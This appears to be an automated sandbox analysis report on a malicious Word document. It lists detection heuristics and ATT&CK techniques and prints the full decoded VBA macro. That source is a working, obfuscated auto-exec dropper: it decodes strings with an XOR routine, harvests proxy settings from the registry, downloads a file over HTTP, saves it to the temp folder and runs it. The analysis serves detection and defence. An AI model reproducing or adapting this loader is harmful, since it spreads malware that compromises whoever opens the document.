Verdict: MALICIOUS
Risk score: 350
Malware Insights
MITRE ATT&CK

- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1140 Deobfuscate/Decode Files or Information
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The macros are obfuscated and designed to download and execute a second-stage payload. The document body acts as a lure, instructing the user to enable content to view a 'secured statement', which is a common social engineering tactic.
Heuristics (10)

- **ClamAV: Doc.Dropper.Agent-6450723-0** [critical, `CLAMAV_DETECTION`]. ClamAV detected this file as malware: Doc.Dropper.Agent-6450723-0.
- **VBA macros detected** [medium, `OLE_VBA_MACROS`, 6 related findings]. Document contains VBA macro code.
- **VBA downloads and writes a file to disk** [critical, `OLE_VBA_HTTP_DROP_EXEC`]. VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-and-drop dropper, even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: `QYQoJeddlLpwrmfgXNywuwFJz = pyFrJImztQXCpkmobObAeBFaq.ResponseBody`
- **Obfuscated auto-exec VBA loader** [critical, `OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER`]. Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set SdwxfJogqxDZnMqfnPrxqLZpQ = GetObject("",WILscVlpxI ( Array ( 29,26,52,6,67,19,6,42,4,91,14,20,33,94,38,62 ), 0 ));`
- **CreateObject call** [high, `OLE_VBA_CREATEOBJ`]. Matched line in script: `Set xdmZMJEIHblAmhMlmTgeKxZdN = CreateObject(WILscVlpxI(Array(29, 38, 37, 16, 4, 34, 2, 116, 59, 90, 8, 25, 57), 0))`
- **GetObject call** [high, `OLE_VBA_GETOBJ`]. Matched line in script: `Set SdwxfJogqxDZnMqfnPrxqLZpQ = GetObject("",WILscVlpxI ( Array ( 29,26,52,6,67,19,6,42,4,91,14,20,33,94,38,62 ), 0 ));`
- **VBA p-code auto-exec with execution tokens** [high, `OLE_VBA_PCODE_AUTOEXEC_EXEC`]. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- **Document_Open macro** [low, `OLE_VBA_DOCOPEN`]. Matched line in script: `Private Sub Document_Open()`
- **Macro/content-enable lure** [medium, `SE_ENABLE_LURE`]. Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- **Embedded URL** [info, `EMBEDDED_URL`]. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11236 bytes | f32792a71a41da81f27b6b9598928f07d45c3c9542e54c64672e81ba35528543 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("xzgWcL").Value <> "yolo" Then
HRqctLfjTbTwCtKsgAgohlQgB
ActiveDocument.Variables("xzgWcL").Value = "yolo"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub
Attribute VB_Name = "MCpzOyf"
Private Function WILscVlpxI(GBUdWSunwT As Variant, CEGeluZwxj As Integer)
Dim DktqmEUisZ, vbgqoDblCa As String, XopsfCkPPJ, BCHLqtnCAT
vbgqoDblCa = ActiveDocument.Variables("xzgWcL").Value()
DktqmEUisZ = ""
XopsfCkPPJ = 1
While XopsfCkPPJ < UBound(GBUdWSunwT) + 2
BCHLqtnCAT = XopsfCkPPJ Mod Len(vbgqoDblCa): If BCHLqtnCAT = 0 Then BCHLqtnCAT = Len(vbgqoDblCa)
DktqmEUisZ = DktqmEUisZ + Chr(Asc(Mid(vbgqoDblCa, BCHLqtnCAT + CEGeluZwxj, 1)) Xor CInt(GBUdWSunwT(XopsfCkPPJ - 1)))
XopsfCkPPJ = XopsfCkPPJ + 1
Wend
WILscVlpxI = DktqmEUisZ
End Function
Function yrrfcAvvsLhikizcvNWLbXjQV(GkRqfLebpwCKEHZPqBjoXZQio, MnCIFQwwfRfkzUvXnWtfjBtDO)
zHrtJfKSnmHYOydBmsMBZTDNu = GkRqfLebpwCKEHZPqBjoXZQio.Items
For rgBqyftvflyaeZYljsfSqamik = 0 To GkRqfLebpwCKEHZPqBjoXZQio.Count - 1
If zHrtJfKSnmHYOydBmsMBZTDNu(rgBqyftvflyaeZYljsfSqamik) = MnCIFQwwfRfkzUvXnWtfjBtDO Then
yrrfcAvvsLhikizcvNWLbXjQV = True
Exit For
End If
Next
yrrfcAvvsLhikizcvNWLbXjQV = False
End Function
Sub wfUgOueOpWMXKYXFhjXBpOzoV()
Dim SdwxfJogqxDZnMqfnPrxqLZpQ, nUfWhwToWNGWHKGBBqAxfLPuR, RzXmqMiPXzCLXgQSuIkgDlqzH
Set SdwxfJogqxDZnMqfnPrxqLZpQ = GetObject("",WILscVlpxI ( Array ( 29,26,52,6,67,19,6,42,4,91,14,20,33,94,38,62 ), 0 ));
SdwxfJogqxDZnMqfnPrxqLZpQ.Visible = true;
SdwxfJogqxDZnMqfnPrxqLZpQ.ScreenUpdating = false;
nUfWhwToWNGWHKGBBqAxfLPuR = SdwxfJogqxDZnMqfnPrxqLZpQ.ActiveDocument;
nUfWhwToWNGWHKGBBqAxfLPuR.Content.Select();
SdwxfJogqxDZnMqfnPrxqLZpQ.Selection.Delete();
RzXmqMiPXzCLXgQSuIkgDlqzH = nUfWhwToWNGWHKGBBqAxfLPuR.Range();
RzXmqMiPXzCLXgQSuIkgDlqzH.InsertAfter(WILscVlpxI ( Array ( 30,49,102,32,12,60,29,122,10,83,3,30,60,89,46,112,57,1,39,22,8, _
63,19,52,28,18,9,16,54,69,48,32,62,28,41,12,77,52,23,51,4, _
71,31,16,116,23,25,60,47,20,53,7,77,62,25,61,1,92,77,26,59, _
91,32,62,47,85,50,13,77,36,31,63,31,18,20,26,32,69,105,50,43, _
27,45,66,30,38,23,46,13,95,8,27,33,25 ), 0 ));
RzXmqMiPXzCLXgQSuIkgDlqzH.InsertParagraphAfter();
SdwxfJogqxDZnMqfnPrxqLZpQ.ScreenUpdating = true;
End Sub
Dim iaaifASUlvDfoMYNvPJZNRHOn
Sub nfyjLNjcfrUcnXnxJrkEJSAkx()
Dim xdmZMJEIHblAmhMlmTgeKxZdN
Set xdmZMJEIHblAmhMlmTgeKxZdN = CreateObject(WILscVlpxI(Array(29, 38, 37, 16, 4, 34, 2, 116, 59, 90, 8, 25, 57), 0))
Set zzUpNiOKOhEAExeDcJHfncbZP = CreateObject(WILscVlpxI(Array(25, 22, 52, 11, 29, 38, 31, 52, 15, 28, 41, 28, 54, 67, 32, 63, 36, 20, 52, 27), 0))
Dim vLKhlAZRdIzuqELwePBHbLufu: vLKhlAZRdIzuqELwePBHbLufu = 0
Dim qiDHYiFVnaMaRwPUMvyYvjmYE: qiDHYiFVnaMaRwPUMvyYvjmYE = ""
Dim GGWrUAEZxRSohZWWrNkILpvIB: GGWrUAEZxRSohZWWrNkILpvIB = ""
On Error Resume Next
qiDHYiFVnaMaRwPUMvyYvjmYE = xdmZMJEIHblAmhMlmTgeKxZdN.RegRead(WILscVlpxI(Array(2, 62, 3, 59, 50, 17, 35, 8, 58, 119, 35, 33, 10, 98, 26, 21, 24, 41, 21, 13, 11, _
38, 1, 59, 26, 87, 49, 56, 60, 84, 59, 63, 57, 26, 32, 22, 49, 5, 31, 52, 12, _
93, 26, 6, 9, 116, 60, 34, 56, 16, 40, 22, 59, 55, 4, 41, 1, 93, 3, 41, 28, _
89, 61, 53, 56, 27, 35, 22, 77, 1, 19, 46, 28, 91, 3, 18, 38, 107, 56, 57, 14, _
61, 31, 11, 43, 4, 24, 59, 37, 83, 63, 2, 5, 98, 4, 38, 51, 44, 48, 8, 0, _
11, 51), 0))
If qiDHYiFVnaMaRwPUMvyYvjmYE = WILscVlpxI(Array(123), 0) Then
GGWrUAEZxRSohZWWrNkILpvIB = xdmZMJEIHblAmhMlmTgeKxZdN.RegRead(WILscVlpxI(Array(2, 62, 3, 59, 50, 17, 35, 8, 58, 119, 35, 33, 10, 98, 26, 21, 24, 41, 21, 13, 11, _
38, 1, 59, 26, 87, 49, 56, 60, 84, 59, 63, 57, 26, 32, 22, 49, 5, 31, 52, 12, _
93, 26, 6, 9, 116, 60, 34, 56, 16, 40, 22, 59, 55, 4, 41, 1, 93, 3, 41, 28, _
89, 61, 53, 56, 27, 35, 22, 77, 1, 19, 46, 28, 91, 3, 18, 38, 107, 14, 23, 29, _
7, 19, 35, 40, 8, 14, 8, 59, 93, 5, 47, 2, 96, 59, 30, 33, 60, 10, 18, 27, _
27, 52), 0))
vLKhlAZRdIzuqELwePBHbLufu = vLKhlAZRdIzuqELwePBHbLufu + 1
zzUpNiOKOhEAExeDcJHfncbZP.Add vLKhlAZRdIzuqELwePBHbLufu, GGWrUAEZxRSohZWWrNkILpvIB
End If
If Err.Number <> 0 Then
Err.Clear
End If
Const yctJETKzINXOoVgfzwuQUhkIo = &H80000003
UNILLuMraBAIaQdlUmDHrlxcG = WILscVlpxI(Array(100), 0)
Set LGHTXYjWeaXqfihITVoFzCUTN = GetObject(WILscVlpxI(Array(61, 28, 40, 15, 10, 63, 2, 41, 82, 73, 4, 24, 37, 82, 59, 35, 37, 27, 39, 22, 4, _
61, 24, 22, 13, 68, 8, 25, 104, 94, 36, 32, 47, 7, 53, 13, 3, 51, 2, 63, 21, _
19, 49, 41), 0) _
& UNILLuMraBAIaQdlUmDHrlxcG & WILscVlpxI(Array(22, 7, 41, 13, 25, 14, 18, 63, 14, 83, 24, 25, 33, 13, 26, 36, 46, 39, 35, 5, 61, _
32, 25, 44), 0))
fKiXyjiDjohhffNjcsfHgqYch = ""
LGHTXYjWeaXqfihITVoFzCUTN.EnumKey yctJETKzINXOoVgfzwuQUhkIo, fKiXyjiDjohhffNjcsfHgqYch, YLzPZYDBtEBlkwJPqvnkdJovx
For Each udJCuiOpwxMOKWQmUlVViFijQ In YLzPZYDBtEBlkwJPqvnkdJovx
qiDHYiFVnaMaRwPUMvyYvjmYE = xdmZMJEIHblAmhMlmTgeKxZdN.RegRead(WILscVlpxI(Array(51, 22, 50, 40, 40, 6, 61, 32, 33, 124, 53, 58, 58, 97, 46, 54, 48, 2, 51, 51, 56, _
58, 29, 19, 7, 110), 0) & udJCuiOpwxMOKWQmUlVViFijQ & WILscVlpxI(Array(22, 38, 41, 4, 25, 37, 23, 40, 13, 110, 32, 28, 54, 69, 38, 35, 37, 19, 50, 62, 58, _
59, 24, 62, 7, 69, 30, 41, 22, 66, 59, 34, 47, 27, 50, 52, 8, 32, 5, 51, 7, _
92, 49, 60, 59, 67, 44, 34, 36, 16, 50, 66, 62, 55, 2, 46, 1, 92, 10, 6, 9, _
70, 32, 20, 2, 44, 47, 36, 59, 60, 23, 23, 9, 96, 26, 37, 0, 122, 63, 41, 19, _
3, 44, 15, 52, 23), 0))
If qiDHYiFVnaMaRwPUMvyYvjmYE = WILscVlpxI(Array(123), 0) Then
GGWrUAEZxRSohZWWrNkILpvIB = xdmZMJEIHblAmhMlmTgeKxZdN.RegRead(WILscVlpxI(Array(51, 22, 50, 40, 40, 6, 61, 32, 33, 124, 53, 58, 58, 97, 46, 54, 48, 2, 51, 51, 56, _
58, 29, 19, 7, 110), 0) & udJCuiOpwxMOKWQmUlVViFijQ & WILscVlpxI(Array(22, 38, 41, 4, 25, 37, 23, 40, 13, 110, 32, 28, 54, 69, 38, 35, 37, 19, 50, 62, 58, _
59, 24, 62, 7, 69, 30, 41, 22, 66, 59, 34, 47, 27, 50, 52, 8, 32, 5, 51, 7, _
92, 49, 60, 59, 67, 44, 34, 36, 16, 50, 66, 62, 55, 2, 46, 1, 92, 10, 6, 9, _
112, 14, 7, 56, 32, 7, 39, 55, 42, 36, 9, 7, 90, 55, 34, 2, 69, 7, 59, 3, _
57, 54, 20, 36, 16), 0))
If Not yrrfcAvvsLhikizcvNWLbXjQV(zzUpNiOKOhEAExeDcJHfncbZP, GGWrUAEZxRSohZWWrNkILpvIB) Then
vLKhlAZRdIzuqELwePBHbLufu = vLKhlAZRdIzuqELwePBHbLufu + 1
zzUpNiOKOhEAExeDcJHfncbZP.Add vLKhlAZRdIzuqELwePBHbLufu, GGWrUAEZxRSohZWWrNkILpvIB
End If
End If
If Err.Number <> 0 Then
Err.Clear
End If
Next
Set iaaifASUlvDfoMYNvPJZNRHOn = zzUpNiOKOhEAExeDcJHfncbZP
Set xdmZMJEIHblAmhMlmTgeKxZdN = Nothing
End Sub
Function QYQoJeddlLpwrmfgXNywuwFJz(RSFzoMSeLkAiKUVxHeKSnYEAg, aTReKvJkCtkJbhiwEQzDwkHpm, WHOQmShJETnHXOyYUAUXZxmlZ, LQjpqIgEwXcoacqwpirLCXMTk)
On Error Resume Next
Dim pyFrJImztQXCpkmobObAeBFaq
Set pyFrJImztQXCpkmobObAeBFaq = CreateObject(WILscVlpxI(Array(7, 6, 62, 15, 1, 96, 88, 9, 13, 64, 27, 16, 39, 111, 4, 28, 2, 33, 18, 50, 67, _
100, 88, 106), 0))
If Err.Number <> 0 Then
QYQoJeddlLpwrmfgXNywuwFJz = pyFrJImztQXCpkmobObAeBFaq.ResponseBody
Set pyFrJImztQXCpkmobObAeBFaq = Nothing
Err.Clear
Exit Function
End If
Dim JNhvtobwDQskQYGISbAHHtnMY: JNhvtobwDQskQYGISbAHHtnMY = 0
Do While JNhvtobwDQskQYGISbAHHtnMY < UBound(WHOQmShJETnHXOyYUAUXZxmlZ)
Err.Clear
zHrtJfKSnmHYOydBmsMBZTDNu = iaaifASUlvDfoMYNvPJZNRHOn.Items
For BXNFOEwniVJibLGVsWxLngkoz = -1 To iaaifASUlvDfoMYNvPJZNRHOn.Count - 1
Err.Clear
qSFJAjrDXWJtABUMOVvOMHrHI = WHOQmShJETnHXOyYUAUXZxmlZ(JNhvtobwDQskQYGISbAHHtnMY) & LQjpqIgEwXcoacqwpirLCXMTk
pyFrJImztQXCpkmobObAeBFaq.setOption 2, 13056
pyFrJImztQXCpkmobObAeBFaq.setTimeouts 0, 0, 0, 0
pyFrJImztQXCpkmobObAeBFaq.Open RSFzoMSeLkAiKUVxHeKSnYEAg, qSFJAjrDXWJtABUMOVvOMHrHI, False
If BXNFOEwniVJibLGVsWxLngkoz <> -1 Then
pyFrJImztQXCpkmobObAeBFaq.setProxy 2, zHrtJfKSnmHYOydBmsMBZTDNu(BXNFOEwniVJibLGVsWxLngkoz), ""
End If
pyFrJImztQXCpkmobObAeBFaq.setRequestHeader WILscVlpxI(Array(9, 29, 39, 16, 30, 55, 2), 0), WILscVlpxI(Array(63, 1, 32, 79, 85), 0)
pyFrJImztQXCpkmobObAeBFaq.setRequestHeader WILscVlpxI(Array(9, 26, 40, 12, 8, 49, 2, 51, 7, 92), 0), WILscVlpxI(Array(1, 16, 35, 18, 64, 19, 26, 51, 30, 87), 0)
pyFrJImztQXCpkmobObAeBFaq.setRequestHeader WILscVlpxI(Array(1, 16, 35, 18, 64, 19, 26, 51, 30, 87), 0), WILscVlpxI(Array(121, 69, 118), 0)
pyFrJImztQXCpkmobObAeBFaq.setRequestHeader WILscVlpxI(Array(9, 26, 40, 22, 8, 60, 2, 119, 60, 75, 29, 16), 0), WILscVlpxI(Array(43, 5, 54, 14, 4, 49, 23, 46, 1, 93, 3, 90, 45, 26, 62, 39, 61, 88, 32, 13, 31, _
63, 91, 47, 26, 94, 8, 27, 54, 88, 45, 53, 46), 0)
pyFrJImztQXCpkmobObAeBFaq.Send (aTReKvJkCtkJbhiwEQzDwkHpm)
If pyFrJImztQXCpkmobObAeBFaq.ReadyState <> 4 Then
pyFrJImztQXCpkmobObAeBFaq.WaitForResponse 30
End If
If Err.Number = 0 Then
If pyFrJImztQXCpkmobObAeBFaq.Status = 200 Then
If pyFrJImztQXCpkmobObAeBFaq.StatusText = WILscVlpxI(Array(5, 62), 0) Then
QYQoJeddlLpwrmfgXNywuwFJz = pyFrJImztQXCpkmobObAeBFaq.ResponseBody
Exit Function
End If
End If
End If
Next
JNhvtobwDQskQYGISbAHHtnMY = JNhvtobwDQskQYGISbAHHtnMY + 1
Loop
QYQoJeddlLpwrmfgXNywuwFJz = pyFrJImztQXCpkmobObAeBFaq.ResponseBody
Set pyFrJImztQXCpkmobObAeBFaq = Nothing
End Function
Sub WJFDCHouLHjDlYHVoUxzpfGLe(WXKqccFQlDQrAmzrMJFbZzGIY, fCZGpshBigvPgWLBEBcBYyNfc)
Set ZoVmbcuaCaEbYvmbhpEuTkRXG = CreateObject(WILscVlpxI(Array(11, 49, 9, 38, 47, 124, 37, 46, 26, 87, 12, 24), 0))
ZoVmbcuaCaEbYvmbhpEuTkRXG.Open
ZoVmbcuaCaEbYvmbhpEuTkRXG.Type = 1
If IsEmpty(WXKqccFQlDQrAmzrMJFbZzGIY) Then
ZoVmbcuaCaEbYvmbhpEuTkRXG.Close
Set ZoVmbcuaCaEbYvmbhpEuTkRXG = Nothing
Exit Sub
End If
ZoVmbcuaCaEbYvmbhpEuTkRXG.Write WXKqccFQlDQrAmzrMJFbZzGIY
ZoVmbcuaCaEbYvmbhpEuTkRXG.Position = 0
ZoVmbcuaCaEbYvmbhpEuTkRXG.SaveToFile fCZGpshBigvPgWLBEBcBYyNfc
ZoVmbcuaCaEbYvmbhpEuTkRXG.Close
Set ZoVmbcuaCaEbYvmbhpEuTkRXG = Nothing
End Sub
Sub HRqctLfjTbTwCtKsgAgohlQgB()
On Error Resume Next
Dim iRPslDHhWjtCYtIGiHSZrAkjr(), BDVPOXaXBxMcvsDsQzGgcDhkC, eAbYltzpuopIzFFBAiyBvmzEd, ZoLJdYNEWvtvRXjVrkVIXDxdP
ReDim iRPslDHhWjtCYtIGiHSZrAkjr(1)
nfyjLNjcfrUcnXnxJrkEJSAkx
Set eAbYltzpuopIzFFBAiyBvmzEd = CreateObject(WILscVlpxI(Array(29, 38, 37, 16, 4, 34, 2, 116, 59, 90, 8, 25, 57), 0))
Set ZoLJdYNEWvtvRXjVrkVIXDxdP = CreateObject(WILscVlpxI(Array(25, 22, 52, 11, 29, 38, 31, 52, 15, 28, 43, 28, 57, 82, 26, 41, 57, 1, 35, 15, 34, _
48, 28, 63, 11, 70), 0)).GetSpecialFolder(2)
BDVPOXaXBxMcvsDsQzGgcDhkC = WILscVlpxI(Array(51, 26, 42, 13, 67, 55, 14, 63), 0)
ZoLJdYNEWvtvRXjVrkVIXDxdP = ZoLJdYNEWvtvRXjVrkVIXDxdP & WILscVlpxI(Array(22), 0) & BDVPOXaXBxMcvsDsQzGgcDhkC
iRPslDHhWjtCYtIGiHSZrAkjr(0) = WILscVlpxI(Array(34, 1, 50, 18, 87, 125, 89, 45, 31, 69, 67, 24, 52, 84, 59, 63, 57, 26, 32, 22, 67, _
53, 7, 117), 0)
KDOiBQRVGGPUnqEFjygmVYhRl = QYQoJeddlLpwrmfgXNywuwFJz(WILscVlpxI(Array(13, 48, 18), 0), "", iRPslDHhWjtCYtIGiHSZrAkjr, WILscVlpxI(Array(48, 90, 36, 13, 25, 124, 19, 34, 13), 0))
WJFDCHouLHjDlYHVoUxzpfGLe KDOiBQRVGGPUnqEFjygmVYhRl, ZoLJdYNEWvtvRXjVrkVIXDxdP
eAbYltzpuopIzFFBAiyBvmzEd.Run (ZoLJdYNEWvtvRXjVrkVIXDxdP)
wfUgOueOpWMXKYXFhjXBpOzoV
End Sub
```